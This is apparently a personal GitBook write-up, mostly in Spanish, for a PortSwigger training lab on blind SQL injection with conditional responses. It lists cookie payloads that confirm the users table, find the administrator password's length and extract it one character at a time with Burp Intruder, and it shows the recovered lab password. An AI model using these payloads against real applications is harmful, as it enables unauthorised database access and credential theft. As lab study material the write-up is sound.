Leunam's PortSwigger
  • 01 SQL Injection
    • 01 Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
    • 02 Lab: SQL injection vulnerability allowing login bypass
    • 04 Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
    • 05 Lab: SQL injection attack, listing the database contents on non-Oracle databases
    • 06 Lab: SQL injection attack, listing the database contents on Oracle
    • 11 Lab: Blind SQL injection with conditional responses
    • 12 Lab: Blind SQL injection with conditional errors
    • 13 Lab: Visible error-based SQL injection
    • 14 Lab: Blind SQL injection with time delays
  • 02 Cross-site scripting
    • 03 Lab: DOM XSS in document.write sink using source location.search inside a select element
    • 04 Lab: DOM XSS in innerHTML sink using source location.search
    • 06 Lab: DOM XSS in jQuery selector sink using a hashchange event
    • 07 Lab: Reflected XSS into attribute with angle brackets HTML-encoded
    • 08 Lab: Stored XSS into anchor href attribute with double quotes HTML-encoded
    • 09 Lab: Reflected XSS into a JavaScript string with angle brackets HTML encoded
    • 22 Lab: Exploiting cross-site scripting to steal cookies
    • 24 Lab: Exploiting XSS to bypass CSRF defenses
  • 03 CSRF
    • 01 Lab: CSRF vulnerability with no defenses
  • 04 Clickjacking
    • 01 Lab: Basic clickjacking with CSRF token protection
    • 02 Lab: Clickjacking with form input data prefilled from a URL parameter
    • 03 Lab: Clickjacking with a frame buster script
  • 06 CORS
    • 01 Lab: CORS vulnerability with basic origin reflection
  • 10 OS Comand Injection
    • 02 Lab: Blind OS command injection with time delays
    • 03 Lab: Blind OS command injection with output redirection
  • 12 Path traversal
    • 01 Lab: File path traversal, simple case
  • 13 Access Control Vulnerability
    • 01 Lab: Unprotected admin functionality
    • 03 Lab: User role controlled by request parameter
    • 04 Lab User role can be modified in user profile 17efab5460ec808c8da6e67d210bf5a2
    • 05 Lab: User ID controlled by request parameter
    • 07 Lab: User ID controlled by request parameter with data leakage in redirect
    • 09 Lab: Insecure direct object references
  • 14 Authentication
    • 01 Lab: Username enumeration via different responses
    • 02 Lab: 2FA simple bypass
    • 03 Lab: Password reset broken logic
  • 15 WebSockets
    • 01 Lab: Manipulating WebSocket messages to exploit vulnerabilities
  • 16 Web cache deception
    • 01 Lab: Exploiting path mapping for web cache deception
  • 20 HTTP Host header attacks
    • 02 Lab: Host header authentication bypass
  • 22 File Upload vulnerabilities
    • 02 Lab Web shell upload via path traversal 17efab5460ec801980d1fa9a1e9e0b67
    • 03 Lab: Web shell upload via path traversal
  • 28 NoSQL Injection
    • 01 Lab Detecting NoSQL injection 17efab5460ec80e19ec7ee42c9d3a627
    • 02 Lab: Exploiting NoSQL injection to extract data
    • 04 Lab: Exploiting NoSQL operator injection to extract unknown fields
  • 29 API Testing
    • 01 Lab: Exploiting server-side parameter pollution in a query string
Powered by GitBook
On this page
  1. 01 SQL Injection

11 Lab: Blind SQL injection with conditional responses

Previous06 Lab: SQL injection attack, listing the database contents on OracleNext12 Lab: Blind SQL injection with conditional errors

Last updated 3 months ago

Si el parametro de Cookie es correcto, nos mostrará el WELCOME BACK

' AND '1'='1;
/// EXISTE TABLA USERS Y fila administrator
' AND (SELECT 'a' FROM users LIMIT 1)='a
' AND (SELECT 'a' FROM users WHERE username='administrator')='a
/// Obtener longitud de la clave, obtenemos que tiene 19 caracteres
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>3)='a

TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a
TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a
// Probamos con Intruder
' AND (SELECT SUBSTRING(password,§1§,1) FROM users WHERE username='administrator')='§a§;
son 19 caracteres, estos pueden ser minuscular y caracteres alfanumericos

administrator
vo60jlee4jbqx13nv8gg

hghgf

Untitled
Untitled
Untitled
Untitled
Untitled
Untitled